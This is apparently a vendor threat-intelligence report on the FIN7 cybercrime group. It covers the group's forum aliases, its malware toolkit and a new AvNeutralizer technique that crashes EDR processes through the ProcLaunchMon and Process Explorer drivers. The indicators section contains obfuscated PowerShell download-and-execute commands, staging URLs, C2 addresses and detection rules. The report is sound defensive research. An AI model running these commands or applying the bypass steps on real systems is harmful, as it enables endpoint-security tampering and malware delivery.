FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks

Executive Summary

• New evidence shows FIN7 is using multiple pseudonyms to mask the group’s true identity and sustain its criminal operations in the underground market
• FIN7’s campaigns demonstrate the group’s adoption of automated SQL injection attacks for exploiting public-facing applications
• AvNeutralizer (aka AuKill), a highly specialized tool developed by FIN7 to tamper with security solutions, has been marketed in the criminal underground and used by multiple ransomware groups
• SentinelLabs has discovered a new version of AvNeutralizer that utilizes a technique previously unseen in the wild to tamper with security solutions, leveraging the Windows built-in driver ProcLaunchMon.sys (TTD Monitor Driver)
• Attribution efforts have expanded our understanding of the AvNeutralizer malware family. This research offers a broader perspective than previous research, enabling better evolution tracking and retrospective analysis

Background

FIN7, an elusive and persistent financially motivated threat group with origins in Russia, has been active since 2012, targeting various industry sectors and causing substantial financial losses in industries such as hospitality, energy, finance, high-tech and retail.

Initially, FIN7 specialized in using POS (Point of Sale) malware for financial fraud. However, beginning in 2020, it shifted its focus to ransomware operations, affiliating with notorious RaaS groups such as REvil and Conti as well as launching its own RaaS programs under the names Darkside and subsequently BlackMatter.

The group has created fraudulent infosec firms, such as Combi Security and Bastion Secure, to deceive security researchers and launch ransomware attacks. Despite setbacks like the arrests of some members, FIN7’s activities have continued, suggesting changing TTPs, temporary breaks or the emergence of splinter groups.

This research explores the group’s activities, from underground operations to new TTPs and malicious campaigns, to help defenders better understand and counteract its operations.

Criminal Underground Operations

In our November 3rd, 2022 report, we discussed the connection between FIN7 and the use of EDR evasion tools in ransomware attacks involving the Black Basta group. Our telemetry revealed that the EDR impairment tool, which we track as “AvNeutralizer” (aka AuKill), targeted multiple endpoint security solutions and was used exclusively by the group for six months. This reinforced our hypothesis that FIN7 and Black Basta might have had a close relationship.

New evidence has emerged since our last report allowing us to refine our understanding of the situation.

Beginning in January 2023, we observed a peak in the usage of updated versions of AvNeutralizer by multiple ransomware groups. This suggests that the tool was no longer exclusive to Black Basta, who shifted several TTPs since our last report and removed AvNeutralizer from its arsenal. We hypothesize that AvNeutralizer was likely sold on criminal underground forums, with Black Basta being one of the early buyers and adopters.

After conducting a thorough analysis, we identified multiple advertisements across various underground forums in which we assess with high confidence that these advertisements were promoting the sale of the AvNeutralizer tool.

On May 19th, 2022, a user named “goodsoft” advertised an AV killer tool for a starting price of $4,000 on the exploit[.]in forum, which targeted various endpoint security solutions. Later, on June 14th, 2022, a user named “lefroggy” published a similar advertisement on the xss[.]is forum for $15,000. A week later, on June 21st, a user named “killerAV” posted a similar advertisement on the RAMP forum for $8,000.

We have observed activity from “goodsoft”, “lefroggy” and “killerAV” on several criminal forums, revealing posts consistent with the interests, motivations and TTPs of FIN7.

On August 10th, 2022, “goodsoft” offered their “PentestSoftware” for sale at a monthly rate of $6,500 on the exploit[.]in forum. The advertisement described the software as a post-exploitation framework with multiple modules designed to infiltrate enterprise networks and evade conventional antivirus programs. The poster claimed that a development team had spent over three years and US $1 million creating the software.

The post provides a link to a PDF manual to demonstrate the software’s legitimacy. Our analysis of the manual shows that the “PentestSoftware” being advertised is referred to as “IceBot” and “Remote System Client” in the manual, exhibiting similarities in functionality to the Diceloader malware. Users “killerAV” and “lefroggy” posted similar advertisements for the “PentestSoftware” on the RAMP and xss[.]is forums shortly afterward.

On March 28th, 2023, a user named “Stupor” advertised an AV killer targeting various security solutions for a starting price of $10,000 on the xss[.]is forum. We collected and analyzed the tool, attributing it with high confidence to an updated version of AvNeutralizer and linking it to the same individual identified in our previous report.

Considering the available evidence and prior intelligence, we assess with high confidence that “goodsoft”, “lefroggy”, “killerAV” and “Stupor” belong to the FIN7 cluster. Furthermore, these threat actors are likely employing multiple pseudonyms on various forums to mask their true identity and sustain their illicit operations within this network.

FIN7 Arsenal

The proficiency of FIN7 in executing sophisticated cyberattacks relies on their versatile arsenal, which includes tools such as Powertrash, Diceloader, Core Impact, an SSH-based backdoor, and AvNeutralizer.

Each of these tools supports various attack phases carried out during the intrusions, allowing the group to adeptly infiltrate, exploit, persist and evade detection.

Powertrash

Powertrash, a heavily obfuscated PowerShell script, is designed to reflectively load an embedded PE file in-memory, enabling the group to stealthily execute their backdoor payloads in their malicious campaigns.

Powertrash has been deployed in FIN7 intrusions as a means to evade defenses.

Although FIN7 isn’t the sole user of Powertrash, it is one of its main adopters.

In order to gain a better understanding of its usage, we carried out a retrospective analysis of approximately 50 available samples to determine the malware families associated with Powertrash.

To facilitate this process, we developed an unpacker based on the PowerShell Abstract Syntax Tree (AST) for effectively handling the highly obfuscated code and automating payload extraction. We’re making the Powertrash unpacker publicly available to encourage further research.

Our analysis of the Timeline of Powertrash-Packed Malware Families revealed a consistent pattern in the usage of the group’s C2 implants. Historically, FIN7 has utilized Carbanak, a privately developed and fully featured C2 framework, to carry out their malicious operations. In line with the timeline, Lizar version 2.0 (aka Diceloader) was discovered in Q1 2021 as an evolution of Carbanak and replaced it. Furthermore, the emergence of Powertrash samples delivering Core Impact implants starting in Q2 2022 correlates with “lefroggy” activities in the criminal underground, where was purchasing cracked copies of Core Impact on the xss[.]is forum.

Diceloader

Diceloader, aka Lizar and IceBot, is a minimal backdoor that enables the attacker to establish a C2 channel. This backdoor allows the attacker to control the system by sending position-independent code (or shellcode) modules, loading them directly in memory and sending the output back to the attacker through an encrypted channel.

The payloads contain an encrypted configuration that instructs the bot on which C2 server and port to connect for control. The payload is not designed to be dropped directly on the disk and is compiled with the ReflectiveLoader implementation to allow in-memory reflective loading. Diceloader has typically been deployed through Powertrash loaders in FIN7 operations.

The attacker uses a helper UI client, also referred to as the “Remote System Client”, to interact with the Diceloader C2 servers and control its victims. This UI client can be used by the operator to load additional modules on multiple victims and progress their attacks within the compromised environments.

The Diceloader C2 server implementation does not hide its specific implementation details, and it produces a unique network signature that can be easily fingerprinted. At the time of this research, we were able to track the active Diceloader C2 infrastructure, which was distributed across various countries and hosting providers.

SSH-based Backdoor

During our investigation into the Diceloader C2 infrastructure, we identified a Diceloader C2 server, attributed with high confidence to FIN7, which exposed an open directory web server used as staging server to serve their payloads.

On this server, we found two Powertrash loaders delivering Diceloader and another directory containing native tools based on OpenSSH and 7zip. These tools appeared to be used as a persistence tactic by the group.

These tools are chained to maintain persistence on the compromised system by downloading the entire toolchain from the staging server and executing the install.bat script.

This script initializes all necessary dependencies and sets up an SFTP server through a reverse SSH tunnel connecting to the attacker’s server using the embedded private key provided in the toolchain. The reverse tunnel is configured as a scheduled task so it can survive reboots. With this setup, the attacker can stealthily exfiltrate files from the compromised machine at any time.

We have observed this tool being exclusively used in intrusions directly operated by FIN7, typically when the group aimed to gather sensitive information from the targeted company.

Core Impact

Core Impact is a penetration testing tool designed for exploitation activities. It offers an extensive library of commercial-grade exploits, aligning well with FIN7’s interests observed in the criminal underground.

The framework enables the generation of Position Independent Code (PIC) implants to take control of exploited systems. These implants come packed with PIC loaders, which use XOR decryption at runtime to evade static detections. The implant configuration includes the C2 server’s IP and port for receiving commands from the attacker, along with an RSA public key for use in the encrypted communication channel.

FIN7 has been delivering Core Impact loaders through Powertrash in their campaigns. To facilitate the analysis of Core Impact implant configurations, we have developed an unpacker that automatically extracts the Core Impact implant from the observed loaders in the wild. The Core Impact unpacker is released as part of this research to encourage further investigation.

Although the RSA public key is initialized when the Core Impact C2 server is started, we have found loaders with overlapping configurations. We attribute, with medium confidence, one specific RSA key to FIN7 operations:

cd19dbaa04ea4b61ace6f8cdfe72dc99a6f807bcda39ceab2fefd1771d44ad288b76bc20eaf9ee26c9a175
bb055f0f2eb800ae6010ddd7b509e061651ab5e883d491244f8c04cbc645717043c74722bee317754ea1
df13e446ca9b1728f1389785daecf915ce27f6806c7bfa2b5764e88e2957d2e9fcfd79597b3421ea4b5e6f

AvNeutralizer

According to our intel, FIN7 began developing a specialized tool to tamper with security solutions in April 2022. We track this tool as “AvNeutralizer” (aka AuKill). The tool has received multiple updates, with a recent iteration including a previously unseen tampering method.

The first usage of this tool, in intrusions detected within our telemetry, was observed in early June 2022. The tool is delivered to buyers as a customized build targeting specific security solutions requested by the buyer. While multiple samples of the tool exhibit the same code, the list of targeted process names may vary based on the attacker’s chosen build.

The earliest version of AvNeutralizer we identified and reported (2fc8b38d3f40d8151ec717c8a8813cf06df90c10) was detected in human-operated intrusions carried out by the Black Basta group, which deployed ransomware to extort victims. This version of the tool exploited weaker versions (< 17.0) of Process Explorer drivers, allowing for cross-process operations between admin processes and protected processes directly from the kernel. The tool utilized this weakness to tamper with security solutions installed on the system.

The userland component was delivered by the attackers during their intrusions using names that mimic the targeted security solutions. We observed file names for the userland component such as AVDieSe.exe, AVDieSophos.exe, AVDieMS.exe and AVDiePanda.exe.

Subsequent updates of AvNeutralizer, detected in our telemetry starting from early 2023, included minor changes like the naming convention that is usually prefixed with “au” followed by the targeted security solution name (e.g., auSentinel.exe, auSophos.exe, auElastic.exe, auSyma.exe) and the usage of the startkey command line parameter. Starting from this version, we observed a significant overlap between what we internally track as AvNeutralizer and the “AuKill” tool documented by Sophos.

Since early 2023, our telemetry data reveals numerous intrusions involving various versions of AvNeutralizer. About 10 of these are attributed to human-operated ransomware intrusions that deployed well-known RaaS payloads including AvosLocker, MedusaLocker, BlackCat, Trigona and LockBit.

Previous research has reported on connections between FIN7 and RaaS groups like LockBit. While we cannot conclusively determine if intrusions involving the LockBit locker and the AvNeutralizer tool were executed by FIN7, we have not found evidence directly linking these activities to the group.

Since Sophos has already provided a detailed analysis of an earlier version of the tool, we will document the updated version of AvNeutralizer (15186e9d03600c667bbe4b34c5e1348bfc0a8168), which now implements previously unseen techniques to tamper with some specific implementations of protected processes.

This updated version has been used in ransomware intrusions starting from April 2023, either as a packed or unprotected payload. Despite different threat actors using the tool, the packer code is identical across various usages, suggesting that FIN7 provides a shared obfuscator to their buyers within the AvNeutralizer bundle.

The packer employs anti-analysis techniques, such as checking the “startkey” command-line argument and using Win32 functions like IsDebuggerPresent and SetUnhandledExceptionFilter to detect debugging executions.

The final PE payload is unpacked with two iterations of XOR decryption, separated by a step of LZNT1 decompression.

The malware uses the ExceptionInfo parameter of the UnhandledExceptionFilter routine (used as the unpacking function) to retrieve the ContextRecord and the values of the debug registers Dr0, Dr1, Dr2, Dr3 and Dr6. These values, set to 0 in non-debugging executions, are used as indexes of the arrays during the decryption routines, causing the unpacking routine to silently fail during debugging sessions to complicate the analysis.

New Technique to Disable Endpoint Security Solutions

The unpacked AvNeutralizer payload (8a03580d29fe1dcc3de9fffaf8960bc339ecd994) employs more than 10 different user mode and kernel mode techniques to tamper with the security solutions installed on the system.

Most of these techniques are already documented, such as removing the PPL protection through the vulnerable RTCore64.sys driver, sandboxing protected processes, leveraging Restart Manager API and Service Control Manager API and more.

However, we discovered a further unique technique that leverages a Windows builtin driver capability previously unseen in the wild.

AvNeutralizer uses a combination of drivers and operations to create a failure in some specific implementations of protected processes, ultimately leading to a denial of service condition. It employs the TTD monitor driver ProcLaunchMon.sys, available on default system installations in the system drivers directory, in conjunction with updated versions of the process explorer driver with version 17.02 (17d9200843fe0eb224644a61f0d1982fac54d844), which has been hardened for cross process operations abuse and is currently not blocked by the Microsoft’s WDAC list.

The steps we observed to be successful in achieving a DoS condition in some protected processes implementations are as follows:

• Drops the process explorer driver in C:\Windows\System32\PED.sys (17d9200843fe0eb224644a61f0d1982fac54d844), loads and connects to the driver device \\.\PROCEXP152;
• Loads the driver C:\Windows\System32\drivers\ProcLaunchMon.sys available on the local system and connects to the driver device \\.\com_microsoft_idna_ProcLaunchMon;
• Configures a new TTD monitoring session by interacting with the ProcLaunchMon driver;
• Adds the PID of the targeted protected process to the TTD monitoring session, causing newly spawned child processes to be suspended (IOCTL: 0x228034);
• Uses the procexp driver to kill all non-protected child processes of the targeted protected process; this is still allowed in updated versions of the process explorer driver;
• The protected process tries to relaunch its child processes, but this time they are suspended by the kernel;
• The protected process is unable to communicate with its child processes and experiences failures due to this condition, ultimately leading to a crash.

Malicious Campaigns

Prodaft’s prior research has highlighted the Checkmarks platform, developed by the FIN7 group as an automated attack system primarily aimed at exploiting public-facing Microsoft Exchange servers. The platform conducts extensive scanning and exploitation by leveraging the ProxyShell exploit, which takes advantage of CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 vulnerabilities.

The Checkmarks platform also incorporates an Auto-SQLi module for SQL Injection attacks. If initial attempts are unsuccessful, the SQLMap tool scans targets for potential SQL injection vulnerabilities. This module provides remote access to the victim’s system, with FIN7 tailoring the system for seamless implementation and adaptability to various situations, thereby expanding the range of exploitable vulnerabilities.

Our findings indicate numerous intrusions leveraging SQL injection vulnerabilities targeting public-facing servers through automated exploitation, which we attribute with medium confidence to FIN7 and the Auto-SQLi module within the Checkmarks system. These intrusions primarily occurred in 2022, with a particular focus during Q3, impacting US companies in the manufacturing, legal and public sector industries.

Observed exploitation activities involve PowerShell droppers with multiple layers of obfuscation, ultimately leading to the final URL that downloads and executes the implant.

The PowerShell droppers employed in these campaigns deliver Powertrash loaders from staging servers, such as hxxp://193.178.210[.]227/work_53.bin_m7.ps1 and hxxp://45.87.154[.]208/icsnd3b_64refl.ps1.

These Powertrash loaders allow the group to gain control over compromised victim systems by loading a backdoor payload. Specifically, we observed Powertrash loaders named with the “work” prefix loading Core Impact implants connecting to the C2 server 37[.]157[.]254[.]8, while those with the “icsnd” prefix loaded Diceloader connecting to the C2 server 194[.]180[.]174[.]86.

In one specific intrusion, the group installed persistence on the exploited system using the SSH-based backdoor through a batch script named install.bat. We suspect that, given the nature of the targeted company, the group’s intention was to establish a covert and persistent access for future espionage operations.

Conclusion

Our investigation into FIN7’s activities highlights its adaptability, persistence and ongoing evolution as a threat group. In its campaigns, FIN7 has adopted automated attack methods, targeting public-facing servers through automated SQL injection attacks.

Additionally, its development and commercialization of specialized tools like AvNeutralizer within criminal underground forums significantly enhance the group’s impact.

FIN7’s continuous innovation, particularly in its sophisticated techniques for evading security measures, showcases its technical expertise. The group’s use of multiple pseudonyms and collaboration with other cybercriminal entities makes attribution more challenging and demonstrates its advanced operational strategies. We hope this research will inspire further efforts to understand and mitigate FIN7’s evolving tactics.

Indicators of Compromise

FIN7 command lines to download and execute backdoor payloads

powershell.exe -ep bypass -w Hidden -noni -c 
"[char[]]'%q>))Ofx.Pckfdu!Ofu/XfcDmjfou*/EpxompbeTusjoh)(i(,(u(,(u(,(q(,(;(,(0(,(0(,(2(,(:(,(4(,(/(,(2(,(8(,(9(,(/(,(3(,(2(,(1(,(/(,(3(,(3(,(8(,(0(,(x(,(p(,(s(,(l(,(`(,(6(,(4(,(/(,(c(,(j(,(o(,(`(,(n(,(8(,(/(,(q(,(t(,(2(**<%q}/)(J(,(f(,(Y(*'|%{$s+=[char]([int]$_-1)};$s|.('I'+'e'+'X')"

powershell.exe -ep bypass -w Hidden -noni -Enc
"WwBjAGgAYQByAFsAXQBdACcAJQBkAG8AdQAhAD4AIQAxADwAIQBlAHAAIQB8ACEAJQBkAG8AdQAsACwAPAAhAHUAcwB6ACEAfAAhAGoAZgB5ACEAKQBPAGYAeAAuAFAAYwBrAGYAZAB1ACEATwBmAHUALwBYAGYAYwBEAG0AagBmAG8AdQAqAC8ARQBwAHgAbwBtAHAAYgBlAFQAdQBzAGoAbwBoACkAKABpACgALAAoAHUAKAAsACgAdQAoACwAKABxACgALAAoADsAKAAsACgAMAAoACwAKAAwACgALAAoADUAKAAsACgANgAoACwAKAAvACgALAAoADkAKAAsACgAOAAoACwAKAAvACgALAAoADIAKAAsACgANgAoACwAKAA1ACgALAAoAC8AKAAsACgAMwAoACwAKAAxACgALAAoADkAKAAsACgAMAAoACwAKABqACgALAAoAGQAKAAsACgAdAAoACwAKABvACgALAAoAGUAKAAsACgANAAoACwAKABjACgALAAoAGAAKAAsACgANwAoACwAKAA1ACgALAAoAHMAKAAsACgAZgAoACwAKABnACgALAAoAG0AKAAsACgALwAoACwAKABxACgALAAoAHQAKAAsACgAMgAoACoAIQB+ACEAZABiAHUAZABpACEAfAAhAH4AIQB+ACEAeABpAGoAbQBmACEAKQAlAGQAbwB1ACEALgBtAHUAIQAyADEAKgAnAHwAJQB7ACQAcwArAD0AWwBjAGgAYQByAF0AKABbAGkAbgB0AF0AJABfAC0AMQApAH0AOwBpAGUAeAAgACQAcwA="

YARA Hunting Rules

rule PS1_Powertrash {
    meta:
    	author = "Antonio Cocomazzi @ SentinelOne"
    	description = "Detects Powertrash: an obfuscated powershell in-memory loader"
    	date = "2023-04-17"
    	reference1 = "https://s1.ai/FIN7-u"
    	reference2 = "https://www.mandiant.com/resources/evolution-of-fin7"
    	reference3 = "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor"
    	hash = "86533fff7813bc140c89bd2ed09b8484afe7e4ac"  	 
    strings:
  	  $regex_packer_signature = /function\s[0-9a-zA-Z]{3,7}\r?\n\{\r?\n(\$[0-9a-zA-Z]{3,7}=.*\r?\n){10}/ ascii wide
    condition:
   	 filesize > 50KB and filesize < 5MB and $regex_packer_signature
}

rule Win32_Diceloader {
    meta:
    	author = "Antonio Cocomazzi @ SentinelOne"
    	description = "Detects Diceloader, aka Lizar/IceBot, a backdoor designed to infiltrate enterprise networks and evade conventional antivirus programs"
    	date = "2023-04-17"
    	reference1 = "https://s1.ai/FIN7-u"
    	hash = "0aeab70affcab0f1e96c62c25dd41dc32d41e2ea"
    strings:
    	$code1 = { 41 F7 ?? 41 03 ?? C1 FA 04 8B C2 C1 E8 1F 03 D0 6B C2 1F 44 ?? ?? 41 ?? ?? 01 }   	 
    	$code2 = { B9 02 02 00 00 48 8D ?? ?? ?? ?? ?? ?? [40-50] C7 ?? ?? ?? 47 6C 6F 62 C7 ?? ?? ?? 61 6C 5C 25 C7 ?? ?? ?? 30 38 78 00 FF 15 }   
    	$code3 = { C7 ?? ?? 47 6C 6F 62 [0-6] C7 ?? ?? 61 6C 5C 25 [0-6] C7 ?? ?? 30 38 78 00 [10-14] 50 6A 00 6A 00 FF 15 ?? ?? ?? ?? [8-12] FF 15 ?? ?? ?? ?? 3D B7 00 00 00 75 }
    condition:   	 
    	uint16(0) == 0x5A4D and filesize < 60KB and 1 of ($code*)
}

rule PIC_CoreImpact_loader {
    meta:
    	author = "Antonio Cocomazzi @ SentinelOne"
    	description = "Detects Position Independent Code of Core Impact loaders observed in the wild"
    	date = "2023-04-17"
    	reference1 = "https://s1.ai/FIN7-u"
    	hash = "52e261a7cab837489dfcb8cd49aaf82ee287968c"
    strings:
    	$code1 = { E9 [4] 5B 48 B9 [8] 49 BA [70-100] E9 05 00 00 00 E8 }
    	$code2 = { E9 [4] 5B 53 48 BB [12] 49 BB [50-60] E9 05 00 00 00 E8}
    	$code3 = { E9 [4] 5B 48 B9 [10] 49 BC [70-100] E9 05 00 00 00 E8 }
    	$code4 = { E9 [4] 5B ?? ?? 49 BB [14] 48 B8 [70-100] E9 05 00 00 00 E8 }
    	$code5 = { E9 [4] 5B ?? 48 B8 [13] 48 B9 [50-60] E9 05 00 00 00 E8}
    	$code6 = { E9 [4] 5B ?? 48 B8 [12] 49 BD [70-100] E9 05 00 00 00 E8}
    	$code7 = { E9 [4] 5B 48 B9 [9] 48 BA [70-100] E9 05 00 00 00 E8}
    condition:   	 
    	1 of ($code*)
}

SentinelOne Singularity STAR Rules

// Detects SSH-based backdoor used by the FIN7 group as a persistence tactic
endpoint.os = 'windows' and meta.event.name = 'SCHEDTASKREGISTER' and src.process.cmdline contains ('\\WINDOWS\\OpenSSH\\ssh.exe')

// Detects multiple C2 implants behaviors including Core Impact framework
endpoint.os = 'windows' and meta.event.name = 'BEHAVIORALINDICATORS' and indicator.name = 'MultipleHookRemovals' and indicator.metadata contains 'function name: ZwFreeVirtualMemory'

// Detects Powertrash obfuscator usage
endpoint.os = 'windows' and meta.event.name ='SCRIPTS' and src.process.name = 'powershell.exe' and cmdScript.content matches 'function\\s[0-9a-zA-Z]{3,7}\\r?\\n\\{\\r?\\n(\\$[0-9a-zA-Z]{3,7}=.*\\r?\\n){10}'